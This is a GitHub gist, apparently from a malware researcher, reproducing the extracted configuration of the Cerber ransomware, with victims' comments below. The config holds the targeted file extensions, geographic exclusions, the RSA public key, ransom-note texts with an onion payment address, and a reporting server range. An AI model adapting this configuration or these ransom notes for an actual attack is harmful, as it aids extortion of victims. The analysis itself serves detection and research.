Skip to content

Instantly share code, notes, and snippets.

@hasherezade hasherezade/config.json Secret
Last active Feb 2, 2017

Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
cerber ransomware
Raw
config.json
{
"antiav": 1,
"blacklist": {
"countries": [
"am",
"az",
"by",
"ge",
"kg",
"kz",
"md",
"ru",
"tm",
"tj",
"ua",
"uz"
],
"files": [
"bootsect.bak",
"iconcache.db",
"thumbs.db",
"wallet.dat"
],
"folders": [
":\\$recycle.bin\\",": \\$windows.~bt\\",
":\\boot\\",": \\drivers\\",
":\\program files\\",": \\program files (x86)\\",
":\\programdata\\",": \\users\\all users\\",
":\\windows\\","\\appdata\\local\\",
"\\appdata\\locallow\\","\\appdata\\roaming\\",
"\\public\\music\\sample music\\","\\public\\pictures\\sample pictures\\",
"\\public\\videos\\sample videos\\","\\tor browser\\"
],
"languages": [
1049,
1058,
1059,
1064,
1067,
1068,
1079,
1087,
1088,
1090,
1091,
2072,
2073,
2092,
2115
]
},
"check": {
"activity": 0,
"country": 1,
"language": 1,
"vmware": 0
},
"debug": 0,
"encrypt": {
"files": [
[
".contact",
".dbx",
".doc",
".docx",
".jnt",
".jpg",
".mapimail",
".msg",
".oab",
".ods",
".pdf",
".pps",
".ppsm",
".ppt",
".pptm",
".prf",
".pst",
".rar",
".rtf",
".txt",
".wab",
".xls",
".xlsx",
".xml",
".zip",
".1cd",
".3ds",
".3g2",
".3gp",
".7z",
".7zip",
".accdb",
".aoi",
".asf",
".asp",
".aspx",
".asx",
".avi",
".bak",
".cer",
".cfg",
".class",
".config",
".css",
".csv",
".db",
".dds",
".dwg",
".dxf",
".flf",
".flv",
".html",
".idx",
".js",
".key",
".kwm",
".laccdb",
".ldf",
".lit",
".m3u",
".mbx",
".md",
".mdf",
".mid",
".mlb",
".mov",
".mp3",
".mp4",
".mpg",
".obj",
".odt",
".pages",
".php",
".psd",
".pwm",
".rm",
".safe",
".sav",
".save",
".sql",
".srt",
".swf",
".thm",
".vob",
".wav",
".wma",
".wmv",
".xlsb",
".3dm",
".aac",
".ai",
".arw",
".c",
".cdr",
".cls",
".cpi",
".cpp",
".cs",
".db3",
".docm",
".dot",
".dotm",
".dotx",
".drw",
".dxb",
".eps",
".fla",
".flac",
".fxg",
".java",
".m",
".m4v",
".max",
".mdb",
".pcd",
".pct",
".pl",
".potm",
".potx",
".ppam",
".ppsm",
".ppsx",
".pptm",
".ps",
".pspimage",
".r3d",
".rw2",
".sldm",
".sldx",
".svg",
".tga",
".wps",
".xla",
".xlam",
".xlm",
".xlr",
".xlsm",
".xlt",
".xltm",
".xltx",
".xlw",
".act",
".adp",
".al",
".bkp",
".blend",
".cdf",
".cdx",
".cgm",
".cr2",
".crt",
".dac",
".dbf",
".dcr",
".ddd",
".design",
".dtd",
".fdb",
".fff",
".fpx",
".h",
".iif",
".indd",
".jpeg",
".mos",
".nd",
".nsd",
".nsf",
".nsg",
".nsh",
".odc",
".odp",
".oil",
".pas",
".pat",
".pef",
".pfx",
".ptx",
".qbb",
".qbm",
".sas7bdat",
".say",
".st4",
".st6",
".stc",
".sxc",
".sxw",
".tlg",
".wad",
".xlk",
".aiff",
".bin",
".bmp",
".cmt",
".dat",
".dit",
".edb",
".flvv",
".gif",
".groups",
".hdd",
".hpp",
".log",
".m2ts",
".m4p",
".mkv",
".mpeg",
".ndf",
".nvram",
".ogg",
".ost",
".pab",
".pdb",
".pif",
".png",
".qed",
".qcow",
".qcow2",
".rvt",
".st7",
".stm",
".vbox",
".vdi",
".vhd",
".vhdx",
".vmdk",
".vmsd",
".vmx",
".vmxf",
".3fr",
".3pr",
".ab4",
".accde",
".accdr",
".accdt",
".ach",
".acr",
".adb",
".ads",
".agdl",
".ait",
".apj",
".asm",
".awg",
".back",
".backup",
".backupdb",
".bank",
".bay",
".bdb",
".bgt",
".bik",
".bpw",
".cdr3",
".cdr4",
".cdr5",
".cdr6",
".cdrw",
".ce1",
".ce2",
".cib",
".craw",
".crw",
".csh",
".csl",
".db_journal",
".dc2",
".dcs",
".ddoc",
".ddrw",
".der",
".des",
".dgc",
".djvu",
".dng",
".drf",
".dxg",
".eml",
".erbsql",
".erf",
".exf",
".ffd",
".fh",
".fhd",
".gray",
".grey",
".gry",
".hbk",
".ibank",
".ibd",
".ibz",
".iiq",
".incpas",
".jpe",
".kc2",
".kdbx",
".kdc",
".kpdx",
".lua",
".mdc",
".mef",
".mfw",
".mmw",
".mny",
".moneywell",
".mrw",
".myd",
".ndd",
".nef",
".nk2",
".nop",
".nrw",
".ns2",
".ns3",
".ns4",
".nwb",
".nx2",
".nxl",
".nyf",
".odb",
".odf",
".odg",
".odm",
".orf",
".otg",
".oth",
".otp",
".ots",
".ott",
".p12",
".p7b",
".p7c",
".pdd",
".pem",
".plus_muhd",
".plc",
".pot",
".pptx",
".psafe3",
".py",
".qba",
".qbr",
".qbw",
".qbx",
".qby",
".raf",
".rat",
".raw",
".rdb",
".rwl",
".rwz",
".s3db",
".sd0",
".sda",
".sdf",
".sqlite",
".sqlite3",
".sqlitedb",
".sr2",
".srf",
".srw",
".st5",
".st8",
".std",
".sti",
".stw",
".stx",
".sxd",
".sxg",
".sxi",
".sxm",
".tex",
".wallet",
".wb2",
".wpd",
".x11",
".x3f",
".xis",
".ycbcra",
".yuv"
]
],
"network": 0,
"new_extension": ".cerber",
"max_block_size": 2,
"max_blocks": 5,
"min_file_size": 0,
"multithread": 1,
"rsa_key_size": 576
},
"global_public_key": "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1QN0laTm1zMUFBN0dQUVVUaE1XYllpRVlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRhMDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0yY29lYURHdmNHUkFjOWU3Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFRXZzdrUE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0RU5Wd2ZOTkVwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4amlFbWMwZnN6azJXTFNuCnFyeWlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRGWVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFEMEgKblFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==",
"help_files": {
"files": [
{
"file_body": "\r\n\r\n C E R B E R\r\n -----------\r\n\r\n\r\n Your documents, photos, databases and other important files have been encrypted!\r\n\r\n\r\n To decrypt your files follow the instructions:\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n 1. Download and install the \"Tor Browser\" from https:\/\/www.torproject.org\/\r\n\r\n\r\n 2. Run it\r\n\r\n\r\n 3. In the \"Tor Browser\" open website:\r\n\r\n http:\/\/decrypttozxybarc.onion\/{PC_ID}\r\n\r\n\r\n 4. Follow the instructions at this website\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n \u00c2\u00ab...Quod me non necat me fortiorem facit.\u00c2\u00bb\r\n",
"file_extension": ".txt"
},
{
"file_body": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <link href=\"http:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap.min.css\" rel=\"stylesheet\">\r\n <meta charset=\"utf-8\">\r\n <meta content=\"IE=edge\" http-equiv=\"X-UA-Compatible\">\r\n <meta content=\"width=device-width, initial-scale=1\" name=\"viewport\">\r\n <title>C E R B E R<\/title>\r\n <\/head>\r\n <body>\r\n <div class=\"container\">\r\n <h3 align=\"center\">C E R B E R<\/h3>\r\n <br \/>\r\n <h4>Your documents, photos, databases and other important files have been encrypted!<br \/><br \/>To decrypt your files follow the instructions:<\/h4>\r\n <br \/>\r\n <div class=\"well\">\r\n <h4>1.&nbsp;&nbsp;&nbsp;Download and install the &laquo;Tor Browser&raquo; from <a href=\"https:\/\/www.torproject.org\/download\/download-easy.html.en\" target=\"_blank\">https:\/\/www.torproject.org\/<\/a><\/h4>\r\n <br \/>\r\n <h4>2.&nbsp;&nbsp;&nbsp;Run it<\/h4>\r\n <br \/>\r\n <h4>3.&nbsp;&nbsp;&nbsp;In the &laquo;Tor Browser&raquo; open website:<br \/><br \/><div class=\"form-group\" style=\"margin: 0 32px 36px 32px;\"><input class=\"form-control\" style=\"color: #c24; font-size: 22px; height: 50px; text-align: center;\" type=\"text\" value=\"http:\/\/decrypttozxybarc.onion\/{PC_ID}\" readonly><\/div><\/h4>\r\n <h4>4.&nbsp;&nbsp;&nbsp;Follow the instructions at this website<\/h4>\r\n <\/div>\r\n <br \/>\r\n <p style=\"color: #ccc;\">&laquo;...Quod me non necat me fortiorem facit.&raquo;<\/p>\r\n <br \/>\r\n <\/div>\r\n <\/body>\r\n<\/html>\r\n",
"file_extension": ".html"
},
{
"file_body": "Set SAPI = CreateObject(\"SAPI.SpVoice\")\r\nSAPI.Speak \"Attention! Attention! Attention!\"\r\nFor i = 1 to 5\r\nSAPI.Speak \"Your documents, photos, databases and other important files have been encrypted!\"\r\nNext",
"file_extension": ".vbs"
}
],
"files_name": "# DECRYPT MY FILES #"
},
"ip_geo": [
{
"property_name": "country",
"url": "http:\/\/ipinfo.io\/json"
},
{
"property_name": "country_code",
"url": "http:\/\/freegeoip.net\/json\/"
},
{
"property_name": "countryCode",
"url": "http:\/\/ip-api.com\/json"
}
],
"servers": {
"statistics": {
"data_finish": "{MD5_KEY}",
"data_start": "{MD5_KEY}{PARTNER_ID}{OS}{IS_X64}{IS_ADMIN}{COUNT_FILES}{STOP_REASON}",
"ip": "87.98.128.0\/19",
"port": 6891,
"send_stat": 1,
"timeout": 1020
}
}
}
Raw
public_key.key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvkty5qhqEydR9076Fevp
0uMP7IZNms1AA7GPQUThMWbYiEYIhBKcT0/nwYrBq0Ogv79K1tta04EHTrXgcAp/
OJgBhz9N58aewd4yZBm2coeaDGvcGRAc9e72ObFQ/TME/Io7LZ5qXDWzDafI8LA8
JQmSz0L+/G+LPTWg7kPOpJT7WSkRb9T8w5QgZRJuvvhErHM83kO3ELTH+SoEI53p
4ENVwfNNEpOpnpOOSKQobtIw56CsQFrhac0sQlOjek/muVluxjiEmc0fszk2WLSn
qryiMyzaI5DWBDjYKXA1tp2h/ygbkYdFYRbAEqwtLxT2wMfWPQI5OkhTa9tZqD0H
nQIDAQAB
-----END PUBLIC KEY-----
@rhamb38

This comment has been minimized.

Sign in to view
Copy link

rhamb38 commented Apr 4, 2016

Could you send me encrypted file for this
@kjwunderle

This comment has been minimized.

Sign in to view
Copy link

kjwunderle commented Apr 15, 2016

I've got some recovered 'getKeys' files from an infected HD, and a 'listFiles' one too. Attached for investigation. I added filetype extension in order to upload since they had none, I can share the originals if necessary; these are not jpeg files, they are of unknown type.

getkeys
listfiles
@jwilczek

This comment has been minimized.

Sign in to view
Copy link

jwilczek commented Apr 29, 2016

Can you share how you extracted this from the EXE?
@Gundo2020

This comment has been minimized.

Sign in to view
Copy link

Gundo2020 commented Aug 2, 2016

Hi Guys,

I got infected with Ransom virus last weekend and i managed to clean my laptop (apparently) but im stuck with the encrypted files.
Is there any software who can allow me to recover them?
Thank you in advance
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.